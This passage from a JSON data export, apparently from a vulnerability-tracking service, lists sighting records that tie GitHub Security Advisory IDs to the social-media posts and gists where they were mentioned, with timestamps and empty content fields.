"https://gist.github.com/safer-bot/fb68192f1973b53b94f2ef663a1bfa44", "content": "", "creation_timestamp": "2025-07-16T13:12:34.000000Z"}, {"uuid": "b25ae81a-fb6d-44f7-b7cc-ae16b7787c8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8qff-qr5q-5pr8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114536305876993048", "content": "", "creation_timestamp": "2025-05-19T20:08:52.127955Z"}, {"uuid": "77b792fa-1035-492f-b309-7375df928fa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rp6-w7mg-h8rw", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "3e9c08d6-8468-45bf-a6d0-5f2426b3d29d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "919a9e51-6a10-40eb-b764-25cd20f107cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-334p-wv2m-w3vp", "type": "seen", "source": "https://gist.github.com/safer-bot/26a09b8c51878f5ec9a6e89f5b7d58cb", "content": "", "creation_timestamp": "2025-07-16T07:00:17.000000Z"}, {"uuid": "2695da05-817b-4911-b162-2c9c8c842a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f946-j5j2-4w5m", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3lsygsqtgiy2f", "content": "", "creation_timestamp": "2025-07-02T14:36:58.735958Z"}, {"uuid": "4f43f76d-a798-4698-89d4-705de6234d8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h9w6-f932-gq62", "type": "seen", "source": "https://gist.github.com/Prithpal-Sooriya/eee17a3d8ae148efad620afc37bfb828", "content": "", "creation_timestamp": "2025-05-19T21:07:15.000000Z"}, {"uuid": "25545267-9559-488e-b5ff-8f0e8492c298", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rfc2-x8hr-536q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114784205722518343", "content": "", "creation_timestamp": "2025-07-02T14:53:03.409318Z"}, {"uuid": "09730d7b-1f4a-4f65-95d9-107ceb460524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r683-v43c-6xqv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114536554270426361", "content": "", "creation_timestamp": "2025-05-19T21:12:02.257362Z"}, {"uuid": "147b8abd-4999-4046-9600-ec9f692509f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3m86-c9x3-vwm9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114784211147922979", "content": "", "creation_timestamp": "2025-07-02T14:54:26.218903Z"}, {"uuid": "0119f149-e044-42f4-ae27-fe6bdb94df2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/5e13e76a11d80f2378b1b43029c98dfc", "content": "", "creation_timestamp": "2025-07-16T07:18:43.000000Z"}, {"uuid": "dec3fde1-a64b-46b0-a7f4-5b3bacba0e92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/5e13e76a11d80f2378b1b43029c98dfc", "content": "", "creation_timestamp": "2025-07-16T07:18:43.000000Z"}, {"uuid": "3fa50010-06ca-4e48-806a-bbb055eafbb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6p68-w45g-48j7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114376948971875398", "content": "", "creation_timestamp": "2025-04-21T16:42:19.334086Z"}, {"uuid": "c214c7f7-13bb-4030-ae44-a50adf691fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8c7v-vccv-cx4q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114378081382038470", "content": "", "creation_timestamp": "2025-04-21T21:30:17.779650Z"}, {"uuid": "1a8c6b8e-e0fa-420e-b04a-d81a73f9df14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33hw-xhfh-944r", "type": "seen", "source": "https://infosec.exchange/users/mttaggart/statuses/114379296023331438", "content": "", "creation_timestamp": "2025-04-22T02:39:11.756071Z"}, {"uuid": "2e345a59-b694-4083-a535-4a7facc5d78c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gmc5-9mpc-xg75", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114859043908564960", "content": "", "creation_timestamp": "2025-07-15T20:05:23.808568Z"}, {"uuid": "62f67060-d544-4859-bf9e-d52703fef59a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/5e13e76a11d80f2378b1b43029c98dfc", "content": "", "creation_timestamp": "2025-07-16T07:18:43.000000Z"}, {"uuid": "9ab95543-ddca-4a1e-a9e8-5b7562976990", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/5e13e76a11d80f2378b1b43029c98dfc", "content": "", "creation_timestamp": "2025-07-16T07:18:43.000000Z"}, {"uuid": "0cc2a2d5-56c9-476c-802c-8fd9dd37e058", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/92387e46916ceee5ae4aaa39e0eb2903", "content": "", "creation_timestamp": "2025-07-16T10:13:10.000000Z"}, {"uuid": "847cbe3e-831c-4725-941b-13038ccc38f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/92387e46916ceee5ae4aaa39e0eb2903", "content": "", "creation_timestamp": "2025-07-16T10:13:10.000000Z"}, {"uuid": "5ef5ff36-366c-4cc6-b0a2-5b42a26369ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/92387e46916ceee5ae4aaa39e0eb2903", "content": "", "creation_timestamp": "2025-07-16T10:13:10.000000Z"}, {"uuid": "c5c999a2-42a0-4411-b8a4-3405462d8ac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/92387e46916ceee5ae4aaa39e0eb2903", "content": "", "creation_timestamp": "2025-07-16T10:13:10.000000Z"}, {"uuid": "27fe8ed8-0365-4d45-98f0-f796eb52057a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-952q-mjrf-wp5j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114859043908564960", "content": "", "creation_timestamp": "2025-07-15T20:05:23.920593Z"}, {"uuid": "4f1a9416-8b5d-4894-be8e-f48e8d563bd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/3c43a302c33a551aa633dcedbb152fe3", "content": "", "creation_timestamp": "2025-07-16T07:18:05.000000Z"}, {"uuid": "d0bdf124-678a-44cb-8f08-d62a4d551f25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/3c43a302c33a551aa633dcedbb152fe3", "content": "", "creation_timestamp": "2025-07-16T07:18:05.000000Z"}, {"uuid": "d75c9b7f-5d1a-4f87-9568-b48a0ae2b3b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7m6h-fqrm-m9c5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114859043908564960", "content": "", "creation_timestamp": "2025-07-15T20:05:24.026729Z"}, {"uuid": "5c06d4e5-59ef-40da-91e7-8582c4aaa666", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hmr7-m48g-48f6", "type": "seen", "source": "https://gist.github.com/safer-bot/3c43a302c33a551aa633dcedbb152fe3", "content": "", "creation_timestamp": "2025-07-16T07:18:05.000000Z"}, {"uuid": "092a3522-74b0-48fa-8e42-26a82b8eb50a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/3c43a302c33a551aa633dcedbb152fe3", "content": "", "creation_timestamp": "2025-07-16T07:18:05.000000Z"}, {"uuid": "25feeeae-7b83-4957-83a7-306ab17db74b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/3c43a302c33a551aa633dcedbb152fe3", "content": "", "creation_timestamp": "2025-07-16T07:18:05.000000Z"}, {"uuid": "b765351a-9bc6-4eab-8f8d-effda6dd1a60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qx2m-rcpc-v43v", "type": "seen", "source": "https://infosec.exchange/users/Tinolle/statuses/114536570753720549", "content": "", "creation_timestamp": "2025-05-19T21:16:13.622018Z"}, {"uuid": "daed29d1-efc3-47b0-becd-3192b654834a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gw9c-4wfm-vj3x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114784351442677607", "content": "", "creation_timestamp": "2025-07-02T15:30:06.979246Z"}, {"uuid": "cd81fb29-551a-457b-ba85-69b8cc3accae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xw5q-g62x-2qjc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114775953190071346", "content": "", "creation_timestamp": "2025-07-01T03:54:19.734042Z"}, {"uuid": "e4996fc2-e253-4550-8d6e-faa8e342bbbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cj7v-27pg-wf7q", "type": "seen", "source": "https://gist.github.com/safer-bot/3c43a302c33a551aa633dcedbb152fe3", "content": "", "creation_timestamp": "2025-07-16T07:18:05.000000Z"}, {"uuid": "5ab9599f-7cf4-4c93-b0a6-5ad11ef185ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/886c55d451a39a81c4d002ee918f1abe", "content": "", "creation_timestamp": "2025-07-16T12:04:21.000000Z"}, {"uuid": "2caa4021-abae-4eb6-985d-fd64ce530c92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/886c55d451a39a81c4d002ee918f1abe", "content": "", "creation_timestamp": "2025-07-16T12:04:21.000000Z"}, {"uuid": "fd66d606-c086-4dfe-9f75-99257cb07d26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/a6a001f7214509ff3dce2d7eb077b5f0", "content": "", "creation_timestamp": "2025-07-16T13:19:23.000000Z"}, {"uuid": "3e480271-2949-42ec-8c2b-119ec77ce927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/a6a001f7214509ff3dce2d7eb077b5f0", "content": "", "creation_timestamp": "2025-07-16T13:19:23.000000Z"}, {"uuid": "04a9f82d-fdf8-4d61-9a40-f63de054180f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/a6a001f7214509ff3dce2d7eb077b5f0", "content": "", "creation_timestamp": "2025-07-16T13:19:23.000000Z"}, {"uuid": "ff597a63-c152-446f-a73d-5c5cd7873c11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/a6a001f7214509ff3dce2d7eb077b5f0", "content": "", "creation_timestamp": "2025-07-16T13:19:23.000000Z"}, {"uuid": "a7680d58-b026-4d97-ba91-f742550295a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m6vm-37g8-gqvh", "type": "seen", "source": "https://gist.github.com/safer-bot/7ddb036557afbccff4b128b5c0cf2325", "content": "", "creation_timestamp": "2025-07-16T14:01:42.000000Z"}, {"uuid": "5964a285-5a70-46fc-a612-db70607ed400", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/79f863c5d4a741ad24b85ddd5fd4cdc4", "content": "", "creation_timestamp": "2025-07-16T07:36:51.000000Z"}, {"uuid": "790fb0d6-3078-414f-aca4-142b059a9802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "3f581674-6fb7-4be3-b010-42d2e3b03913", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "e01ea5cd-7390-402a-9dec-eaa53ce58bca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "68ffb9f9-84df-4126-8842-7a132dba7412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "523d9f0f-6285-4461-8cc5-0ee880bc6b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "89ee353d-2213-40d3-99d0-476e42447974", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/79f863c5d4a741ad24b85ddd5fd4cdc4", "content": "", "creation_timestamp": "2025-07-16T07:36:51.000000Z"}, {"uuid": "da6f6a16-7f0b-4189-8d36-b64a7efd2ee6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "68c8d841-b36a-4cfc-a7b3-e8315d00935e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "29f00e3e-db55-4694-8e37-fe895f6a7f95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "7b00d355-eebd-4edd-874f-1f43a6deb55b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "771844a3-a624-481b-8203-f24ee52d5eda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/ace78b383bfdb5eb0e5df4d41c5d7c3e", "content": "", "creation_timestamp": "2025-06-17T11:28:43.000000Z"}, {"uuid": "6afdad7a-e637-41f9-8a66-6fd45cbb2231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/79f863c5d4a741ad24b85ddd5fd4cdc4", "content": "", "creation_timestamp": "2025-07-16T07:36:51.000000Z"}, {"uuid": "08f4bccc-e3c1-4ae9-8631-58ee83c94fe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/b2e1dad03eb128ff7f5aa2a1bd9c0093", "content": "", "creation_timestamp": "2025-07-16T12:08:01.000000Z"}, {"uuid": "e351882f-79b9-4c3f-a8a0-efb237c9cd03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/a6a001f7214509ff3dce2d7eb077b5f0", "content": "", "creation_timestamp": "2025-07-16T13:19:23.000000Z"}, {"uuid": "55c29922-360f-47cc-8582-34493059dff1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wrvw-hg22-4m67", "type": "seen", "source": "https://gist.github.com/safer-bot/7ddb036557afbccff4b128b5c0cf2325", "content": "", "creation_timestamp": "2025-07-16T14:01:42.000000Z"}, {"uuid": "3cf2ef55-db25-4ca0-867f-7650e53afb45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/7ddb036557afbccff4b128b5c0cf2325", "content": "", "creation_timestamp": "2025-07-16T14:01:42.000000Z"}, {"uuid": "b8e99d47-6c5e-4cde-90dc-8ace230f1c2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/79f863c5d4a741ad24b85ddd5fd4cdc4", "content": "", "creation_timestamp": "2025-07-16T07:36:51.000000Z"}, {"uuid": "fd8a446a-7c93-499d-b38c-ab79a65912e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hh26-6xwr-ggv7", "type": "seen", "source": "https://gist.github.com/safer-bot/3b6f58842b89a0626fbc1de3dc57a9d6", "content": "", "creation_timestamp": "2025-06-17T11:50:03.000000Z"}, {"uuid": "86364a95-841f-4179-b458-3594440bc7f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4q3-7g4q-x89m", "type": "seen", "source": "https://gist.github.com/safer-bot/3b6f58842b89a0626fbc1de3dc57a9d6", "content": "", "creation_timestamp": "2025-06-17T11:50:03.000000Z"}, {"uuid": "b770b4bb-fd85-4e0a-991f-1b184b04442e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/18772d4db7c1d108730e9247a2c0554b", "content": "", "creation_timestamp": "2025-07-16T07:45:04.000000Z"}, {"uuid": "becfa80c-8f05-496f-86c2-d2b45f833bef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/18772d4db7c1d108730e9247a2c0554b", "content": "", "creation_timestamp": "2025-07-16T07:45:04.000000Z"}, {"uuid": "7f005205-fad1-44a4-87fd-221f49506d28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/18772d4db7c1d108730e9247a2c0554b", "content": "", "creation_timestamp": "2025-07-16T07:45:04.000000Z"}, {"uuid": "e93af485-c107-4737-925a-9d574b9c39bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "c67231da-1c38-4f5d-b66a-b4eee1e31f2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "928f5ff6-48eb-487f-adaf-44f107283153", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "40d5ac0e-52a5-4f62-9384-d8c454141a7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "7054f87b-95c9-42a4-9d52-e8a1fac102e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "4e792fac-2f07-420f-a648-25e3cc56f5af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "b63ae389-8633-4bae-ab43-48cdf3b48c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hh82-3pmq-7frp", "type": "seen", "source": "https://gist.github.com/safer-bot/74e21949896b589baa948e9ed6f5748a", "content": "", "creation_timestamp": "2025-06-17T12:51:43.000000Z"}, {"uuid": "28d72406-09e4-45de-9d8b-aacc58101895", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jpm-x58v-624v", "type": "seen", "source": "https://gist.github.com/safer-bot/74e21949896b589baa948e9ed6f5748a", "content": "", "creation_timestamp": "2025-06-17T12:51:43.000000Z"}, 